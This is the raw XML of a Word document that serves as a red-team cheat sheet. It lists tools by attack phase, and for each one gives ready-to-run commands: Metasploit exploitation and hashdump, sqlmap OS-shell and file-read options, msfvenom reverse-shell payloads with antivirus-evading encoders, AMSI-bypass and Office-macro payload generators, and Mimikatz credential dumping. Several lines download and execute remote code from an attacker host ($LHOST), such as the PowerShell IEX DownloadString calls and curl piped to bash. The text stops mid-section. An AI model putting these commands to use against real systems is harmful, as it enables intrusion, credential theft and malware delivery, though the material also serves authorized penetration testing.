        <w:t>GitHub code and repository search tool using GitHub dorks to discover sensitive files, credentials, API keys, and internal documentation exposed in public repositories.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Token &amp; Key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-org $ORG_NAME -d $DORKS_FILE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Password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-t $TARGET_DOMAIN -d 'password'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API Key Extraction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-t $TARGET_DOMAIN -d 'api_key'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Database Connection String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-t $TARGET_DOMAIN -d 'DB_PASSWORD'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Private Key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-t $TARGET_DOMAIN -d 'BEGIN RSA PRIVATE KEY'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Env File Exposure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-t $TARGET_DOMAIN -d '.env'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Docker Hub Secrets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-t $TARGET_DOMAIN -d 'DOCKER_PASSWORD'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Org-Wide Dork Sweep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-org $ORG_NAME -dorks $DORKS_FILE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User Repository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-u $GITHUB_USER -dorks $DORKS_FILE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Sensitive Extension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GitDorker.py -tf $TOKENS_FILE -t $TARGET_DOMAIN -d 'extension:pem OR extension:pfx OR extension:p12'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RustScan</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_10" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Extremely fast port scanner written in Rust that finds open ports in seconds and automatically pipes results to Nmap for service enumeration.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Quick Port Find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--range 1-65535 -t 1500 -b 2500 -- -sV -sC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Top Ports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--top -t 1500 -- -sV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Nmap Full Integration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--range 1-65535 -- -A -sC -sV --script vuln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Input Multiple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$HOSTS_FILE -t 1500 -b 3000 --ulimit 5000 -- -sV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Nmap Args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--range 1-65535 -- -Pn -sS -sV --script ssl-enum-ciphers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Nmap TTY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--range 1-65535 --no-nmap -- -sV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Exclude Ports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--range 1-65535 -e $EXCLUDE_PORTS -- -sV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Scan Order Random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--range 1-65535 --scan-order Random -t 2000 -- -sV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Accessible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--range 1-65535 --accessible -- -sV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Greppable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rustscan -a $TARGET --range 1-65535 -g -- -sV -oN $OUTPUT_FILE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3: Initial Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Techniques and tools used to gain the first foothold into the target environment through exploitation of public-facing applications, services, and human vectors.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Metasploit Framework</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_01" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The world's most used penetration testing framework with thousands of exploits, payloads, and auxiliary modules for comprehensive attack execution.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Exploit Search &amp; Use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'search $KEYWORD; use $EXPLOIT_PATH; set RHOSTS $TARGET; set LHOST $LHOST; set LPORT $LPORT; exploit'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Listener Handler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'use exploit/multi/handler; set PAYLOAD $PAYLOAD; set LHOST $LHOST; set LPORT $LPORT; set ExitOnSession false; exploit -j'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Auto Exploit Module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'use $EXPLOIT_PATH; set RHOSTS $TARGET; set TARGETURI $URI; set LHOST $LHOST; check; exploit'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Credential Spray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'use auxiliary/scanner/$SERVICE/$MODULE; set RHOSTS $TARGET; set USER_FILE $USERLIST; set PASS_FILE $PASSLIST; set THREADS 50; run'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Post-Exploitation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'sessions -i $SESSION_ID; sysinfo; getuid; getsystem; hashdump; loot'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DB Nmap Import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'db_import $NMAP_FILE; hosts; services; vulns'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Web App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'use exploit/multi/http/$MODULE; set RHOSTS $TARGET; set TARGETURI $PATH; set PAYLOAD $PAYLOAD; set LHOST $LHOST; exploit'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Auxiliary Scanner Batch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'use auxiliary/scanner/$PROTOCOL/$MODULE; set RHOSTS_FILE $TARGETS; set THREADS 100; run; services'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Evasion Payload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-x 'use evasion/$MODULE; set PAYLOAD $PAYLOAD; set LHOST $LHOST; set LPORT $LPORT; set Encoder $ENCODER; generate -f $FORMAT -o $OUTPUT_FILE'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Resource Script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msfconsole -q -r $RESOURCE_FILE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SQLMap</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_02" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automatic SQL injection and database takeover tool with support for all major database engines, advanced fingerprinting, and data extraction capabilities.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Basic Injection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--batch --random-agent --level 3 --risk 2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Database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--batch --dbs --threads 10 --random-agent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Table Extraction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-D $DATABASE --tables --batch --threads 10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Column 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-D $DATABASE -T $TABLE --columns --batch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Data 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-D $DATABASE -T $TABLE -C $COLUMNS --dump --batch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OS Shell Access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--os-shell --batch --technique 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Read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--file-read '/etc/passwd' --batch --technique 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Cookie Injection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--cookie='$COOKIE' --level 5 --risk 3 --batch --dump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Request File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-r $REQUEST_FILE --batch --level 4 --risk 3 --random-agent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All-in-One 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sqlmap -u '$URL' --dump-all --batch --threads 10 --random-agent --output-dir=$OUTPUT_DIR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Commix</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_03" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated command injection and exploitation tool that detects and exploits command injection vulnerabilities in web applications and parameters.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URL Command Injection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--level 3 --batch --random-agent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Data Parameter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--data='$POST_DATA' --level 3 --batch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Cookie Injection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--cookie='$COOKIE' --level 3 --batch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Reverse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--os-cmd='whoami' --level 3 --batch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Upload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--file-upload=$FILE_PATH --file-dest=$DEST_PATH --level 3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Header Injection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--level 3 --headers --batch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Shellshock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--level 3 --batch --shellshock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Writable Path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--level 3 --writable-path=/tmp --batch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Proxy with Injection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--proxy=$PROXY --level 3 --batch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Tamper Script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commix.py -u '$URL' --level 3 --tamper=$TAMPER_SCRIPT --batch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XSStrike</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_04" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced XSS detection and exploitation suite with intelligent payload generation, context analysis, and DOM scanning capabilities.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Single URL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'$URL' --level 3 --crawl --blind '$BLIND_URL'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Parameter Fuzzing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'$URL' --data '$POST_DATA' --level 3 --fuzzer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DOM XSS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'$URL' --dom --level 3 --crawl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Input URLs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--seeds $URL_FILE --level 3 --crawl --blind '$BLIND_URL'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Path Injection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'$URL/$PAYLOAD' --path --level 3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Blind XSS Hunter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'$URL' --crawl --blind '$BLIND_URL' --level 3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Headers Injection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'$URL' --headers --level 3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Cookie Injection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'$URL' --cookie '$COOKIE' --level 3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Stealth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'$URL' --level 3 --crawl --timeout 15 --delay 2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Aggressive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xsstrike.py -u '$URL' --level 3 --crawl --fuzzer --blind '$BLIND_URL' --headers --threads 10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Gobuster</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_05" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast, multi-threaded directory, file, DNS, and virtual host brute-forcer written in Go for discovering hidden endpoints and resources.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Directory Brute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dir -u $URL -w $WORDLIST -t 50 -x php,html,txt,bak,zip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dir -u $URL -w $WORDLIST -t 50 -x php,asp,aspx,jsp,html,txt,conf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Subdomain Brute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dns -d $DOMAIN -w $WORDLIST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Virtual Host Discovery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vhost -u $URL -w $WORDLIST -t 50 --append-domain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S3 Bucket Hunt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s3 -w $WORDLIST -t 100 --proxy $PROXY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GCS Bucket Brute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gcs -w $WORDLIST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TFTP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tftp -s $TARGET -w $WORDLIST -t 50 -o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Extensions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dir -u $URL -w $WORDLIST -t 50 -x php,asp,aspx,jsp,do,action,txt,bak -e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Status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dir -u $URL -w $WORDLIST -t 50 -b 404,403 -s 200,301,302 -o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Recursive Deep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gobuster dir -u $URL -w $WORDLIST -t 50 -x php,html -r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Burp Suite CE (CLI)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_06" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Industry-standard web application security testing platform with CLI automation for vulnerability scanning, crawling, and attack replay.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Crawl &amp; Audit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--config-file=$CONFIG --crawl-and-audit $URL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Scan from Sitemap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--scan-from-sitemap $SCOPE_FILE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Headless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java -jar burpsuite_pro.jar --headless --project-file=$PROJECT_FILE --scan $TARGET_URL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Repeater Replay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--repeater-request=$REQUEST_FILE --host=$TARGET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Spider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--spider $URL --scope=$SCOPE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Active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--active-scan $URL --config=$SCAN_CONFIG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Report Generation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--report=$REPORT_TYPE --output=$OUTPUT_FILE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Extension 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--extensions=$EXTENSIONS_DIR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Proxy Capture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--proxy-intercept --save-traffic=$OUTPUT_FILE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Collaborator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burpsuite --project-file=$PROJECT_FILE --collaborator --scan $URL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OWASP ZAP (CLI)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_07" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open-source web application security scanner with daemon mode, automated scanning, API-driven testing, and extensive script support.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Auto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-quickurl $URL -quickprogress -quickout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Spider Target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-quickurl $URL -spider -out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Ajax Spider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-quickurl $URL -ajaxSpider -out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Active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-quickurl $URL -activeScan -out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Baseline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-baseline $URL -r $REPORT_FILE -w $WARNINGS_FILE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-fullscan $URL -r $REPORT_FILE -J $JSON_REPORT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API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-apiscan $API_URL -f openapi -r $REPORT_FILE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Script Console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-script $SCRIPT_PATH -quickurl $URL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Authentication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-cmd -quickurl $URL -auth-loginurl $LOGIN_URL -auth-credentials $USER:$PASS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Daemon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zap.sh -daemon -host 127.0.0.1 -port 8080 -config api.key=$API_KEY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SearchSploit</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_08" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Command-line search tool for Exploit-DB that finds publicly available exploits and proof-of-concept code for known vulnerabilities.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Keyword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$KEYWORD -w --exclude='/dos/'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Exact Title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-t $TITLE --exclude='/dos/'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CVE Lookup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--cve $CVE_ID -w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Remote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$KEYWORD --exclude='/dos/' | grep 'remote'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Mirror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-m $EXPLOIT_ID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Examine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-x $EXPLOIT_ID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Copy to Working Dir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-p $EXPLOIT_ID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Nmap XML Integration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--nmap $NMAP_FILE -w --exclude='/dos/'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JSON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$KEYWORD -j --exclude='/dos/'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Update Database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searchsploit -u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Nikto</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_09" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Comprehensive web server scanner that tests for dangerous files, outdated server software, configuration issues, and web application vulnerabilities.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Server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-p $PORTS -C all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SSL/TLS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-p 443 -ssl -C all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Tuning Specific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-Tuning x 0 1 2 3 4 5 6 7 8 9 -output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Mutate Tests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-mutate 1,2,3 -output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Vhost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$IP_ADDRESS -vhost $DOMAIN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IDS Evasion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-evasion 1,2 -useragent '$USER_AGENT'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Plugin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-Plugins '$PLUGIN_LIST'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Authentication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-id $USER:$PASSWORD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MaxTime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-maxtime 30m -o $OUTPUT_FILE -Format htm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CIS Benchmark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nikto -h $TARGET -config $CONFIG_FILE -Plugins 'cgi'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Feroxbuster</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc003_10" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast, simple, recursive content discovery tool written in Rust with wildcard filtering, state restoration, and extensible scan configuration.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Recursive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-t 100 -d 4 -o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Deep Scan Quiet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-q -t 100 -d 5 -o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Extensions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-x php,html,txt,json,zip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Insecure SSL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-k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Proxy Support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--proxy $PROXY_URL -t 50 -o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State Save &amp; Resume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--state-file $STATE_FILE -R -t 100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Headers Injection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-H '$HEADER_NAME: $HEADER_VALUE' -t 100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Query Parameter Fuzz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'$URL?FUZZ=test' -w $WORDLIST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Extract Links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--extract-links -t 100 -o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Filter Status Codes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feroxbuster -u $URL -w $WORDLIST --filter-status 404,403 -t 100 -o $OUTPUT_FILE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4: Payload Delivery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Methods and tools for crafting, encoding, encrypting, and delivering payloads to target systems while evading detection mechanisms and security controls.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MSFvenom</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_01" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Metasploit's standalone payload generator that creates customized executable, script, and shellcode payloads with multiple encoding and encryption options.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Reverse TCP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$PAYLOAD_TYPE LHOST=$LHOST LPORT=$LPORT -f $FORMAT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Windows EXE Encoder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windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -e x64/xor_dynamic -i 5 -f exe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Linux ELF Binary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linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf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Python Script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cmd/unix/reverse_python LHOST=$LHOST LPORT=$LPORT -f raw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PowerShell Base64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windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f psh-cmd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Java WAR File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java/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f war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Android APK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android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT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Template Inject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windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -x $TEMPLATE_EXE -f exe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Encrypted Payload AES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windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --encrypt aes256 --encrypt-key $KEY -f exe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Loopback Listener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msfvenom -p $PAYLOAD_TYPE LHOST=127.0.0.1 LPORT=$LPORT -f $FORMAT | base64 -w 0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Veil Framework</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_02" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Payload obfuscation and evasion framework designed to bypass common antivirus solutions through encryption and custom stub generation.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Evasion EXE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-t Evasion -p $PAYLOAD_NAME --ip $LHOST --port $LPORT -o $OUTPUT_NAME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Ordnance Shellcode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-t Ordnance -p $PAYLOAD --ip $LHOST --port $LPORT -o $OUTPUT_NAME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AES Encrypted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-t Evasion -p $PAYLOAD_NAME --ip $LHOST --port $LPORT --encrypt aes -o $OUTPUT_NAME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Encoder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-t Evasion -p $PAYLOAD_NAME --ip $LHOST --port $LPORT --compiler pyinstaller --o $OUTPUT_NAME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Sandbox Evasion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-t Evasion -p $PAYLOAD_NAME --ip $LHOST --port $LPORT --sandbox -o $OUTPUT_NAME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Ordnance Reverse TCP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-t Ordnance -p reverse_tcp --ip $LHOST --port $LPORT --badchars \x00\x0a -f $FORMAT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 Payloads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-l payloads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Update Framework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--update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Cleanup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--clean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Setup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veil --setup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Unicorn</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_03" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell downgrade attack and macro injection tool that creates reverse shells through PowerShell and integrates with Office documents.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PowerShell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$ATTACK_TYPE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HTA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hta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Macro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macro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CERTUTIL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certutil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PS1 Direct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ps1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DDE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dde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AMSI Bypass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amsi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ELF Binary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elf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Encoder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$PAYLOAD $LHOST $LPORT custom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Cleanup Generator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unicorn.py cleanup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Empire</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_04" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Post-exploitation and payload delivery framework with pure PowerShell agents, modular architecture, and extensive evasion capabilities.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Listener Setup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-s 'listeners;uselistener $LISTENER_TYPE;set Host http://$LHOST:$LPORT;set Port $LPORT;execute'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Stager Generate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-s 'usestager $STAGER_TYPE;set Listener $LISTENER;execute'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Agent Interaction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-s 'agents;interact $AGENT_NAME;shell whoami'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Module Execute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-s 'usemodule $MODULE_PATH;set Agent $AGENT;execute'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Credentials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-s 'creds;add $DOMAIN $USER $PASSWORD'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Rest API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--rest --username $USER --password $PASSWORD --port 1337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Headless Server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--headless --rest --username $USER --password $PASSWORD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Stager to File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-s 'usestager $STAGER_TYPE;set Listener $LISTENER;set OutFile $OUTPUT_FILE;execute'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Agent Shell Command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-s 'agents;interact $AGENT;upload $LOCAL_FILE $REMOTE_PATH'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Mimikatz Module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empire -s 'usemodule credentials/mimikatz/logonpasswords;set Agent $AGENT;execute'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Cobalt Strike (CLI)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_05" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced threat emulation platform with malleable C2, Aggressor Scripts, and sophisticated payload delivery for adversary simulation.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Team Server Start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./teamserver $LHOST $PASSWORD $C2_PROFILE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C2 Profile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./c2lint $C2_PROFILE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Aggressor Script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./agscript $LHOST $PORT $USER $PASSWORD $AGGRESSOR_SCRIPT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Artifact Kit Build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cd $ARTIFACT_KIT_DIR; ./build.sh pipe $C2_PROFILE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Resource Kit Build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cd $RESOURCE_KIT_DIR; ./build.sh $C2_PROFILE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Malleable C2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./c2lint $C2_PROFILE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Third Party C2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./teamserver $LHOST $PASSWORD $C2_PROFILE -Dc2.pipe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HTTP Beacon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$C2_PROFILE | grep -A 10 'http-beacon'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Script Console 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./agscript $LHOST $PORT $USER $PASSWORD -c 'load $SCRIPT.cna'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Powershell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-c "$client = New-Object Net.WebClient;IEX $client.DownloadString('http://$LHOST:$LPORT/a')"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Macro_Pack</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_06" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced MS Office document and VBS/JScript payload generator with anti-analysis, anti-sandbox, and polymorphic encoding capabilities.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VBA Macro Generate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-t $TEMPLATE -G $OUTPUT_DOC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DDE Auto Open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--dde -G $OUTPUT_DOC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XLM Excel 4.0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-t $TEMPLATE_XLM -G $OUTPUT_XLS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Embed EXE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-e $EMBEDDED_EXE -G $OUTPUT_DOC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Listen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-l $LPORT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Template Obfuscate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-t $TEMPLATE --obfuscate -G $OUTPUT_DOC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Control AV Bypass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-t $TEMPLATE --av-bypass -G $OUTPUT_DOC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Embed Powershell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--vb-psh -G $OUTPUT_DOC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Shortcut LNK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-t $TEMPLATE -G $OUTPUT_LNK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Help HTA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macro_pack.exe --hta -G $OUTPUT_HTA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Sherlock</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_07" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell script for quickly finding local privilege escalation vulnerabilities on Windows systems through missing patches and misconfigurations.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Vuln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Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-AllVulns"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Specific CVE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Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-$VULN_NAME"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MS16-032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Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-MS16032"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MS17-010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Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-MS17010"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MS15-051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Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-MS15051"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MS14-058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Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-MS14058"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Local File Import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"Import-Module .\Sherlock.ps1; Find-AllVulns"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URL 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Net.WebClient).DownloadString('$CUSTOM_URL'); Find-AllVulns"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Output to File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Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-AllVulns | Out-File $OUTPUT_FILE"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WMI Exec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wmic /node:$TARGET /user:$USER /password:$PASSWORD process call create "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://$LHOST:$LPORT/Sherlock.ps1'); Find-AllVulns"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Donut</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_08" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Position-independent code generator that enables in-memory execution of .NET assemblies, VBS, JS, and XSL from any location without touching disk.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.NET Assembly Convert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$ASSEMBLY_FILE -c $CLASS_NAME -m $METHOD -p '$PARAMETERS'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URL Loader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$ASSEMBLY_FILE -u http://$LHOST:$LPORT/$FILE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Entropy High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$ASSEMBLY_FILE -e 3 -o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Bypass AMSI &amp; WLDP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$ASSEMBLY_FILE -a 1 -b 1 -o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VBS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$VBS_FILE -o $OUTPUT_FILE.b64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XSL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$XSL_FILE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Thread Creation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$ASSEMBLY_FILE -t $THREAD_OPTION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Module Overload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$ASSEMBLY_FILE -z 3 -o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Unicode Parameters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$ASSEMBLY_FILE -c $CLASS -m $METHOD -w -p '$WIDE_PARAMS'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Runtime Compress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donut -f $ASSEMBLY_FILE -x 1 -o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Sliver</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_09" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open-source cross-platform adversary emulation and red team framework written in Go with malleable C2, DNS/HTTP/MTLS implants, and multiplayer mode.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Generate Implant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generate --mtls $LHOST --save $OUTPUT_DIR --format $FORMAT --os $OS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 C2 Listener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operator --lhost $LHOST --lport $LPORT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Canary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dns --domains $DOMAIN.canary --lhost $LHOST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Beacon Generate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generate beacon --http http://$LHOST:$LPORT --seconds 30 --jitter 10 --save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Session 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sessions -i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Multiplayer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daemon --lhost $LHOST --lport $LPORT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Operator Connect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sliver-client connect --lhost $LHOST --lport $LPORT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Armory Install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armory install $EXTENSION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Profiles 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profiles new --mtls $LHOST --format shellcode --arch amd64 $PROFILE_NAME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WG Listener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sliver-server wg --lport $PORT --nport $N_PORT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Python-pty-shells</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004_10" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collection of Python-based pseudo-terminal shells for upgrading simple reverse shells to fully interactive TTY sessions with job control and terminal features.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Bash TTY Upgrade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python3 -c 'import pty; pty.spawn("/bin/bash")'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Python PTY Listener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pty_shell.py -b $LHOST -p $LPORT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Reverse PTY Connect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pty_shell_reverse.py -t $TARGET -p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Socat Full TTY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file:\`tty\`,raw,echo=0 tcp-listen:$LPORT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Stabilize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python3 -c 'import pty; pty.spawn("/bin/bash")'; export TERM=xterm; stty raw -echo; fg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Script Listener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script -qc /bin/bash /dev/null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Ruby PTY Spawn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ruby -e 'exec "/bin/bash"'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Perl TTY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perl -e 'exec "/bin/bash"'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Socat Encrypted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openssl-listen:$LPORT,cert=$CERT,key=$KEY,fork,verify=0 stdout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LinPEAS Execution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curl -sL http://$LHOST:$LPORT/linpeas.sh | bash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5: Privilege Escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Techniques and tools for elevating access from standard user to administrator or root level by exploiting system misconfigurations, kernel vulnerabilities, and permission flaws.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LinPEAS</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_01" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Linux Privilege Escalation Awesome Script that automates the search for local privilege escalation vectors on Linux systems with comprehensive checks.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System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-a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Quick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-q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Network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-N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Password Search Deep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-P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Interesting Files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-I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Color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-n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Fast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-s -N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Temp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-T $TEMP_DIR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Stealth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timeout 300 ./linpeas.sh -s 2&gt;/dev/null | tail -n 200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Specific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| grep -E 'root|SUID|sudo|writable|password|cron' &gt;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WinPEAS</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_02" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
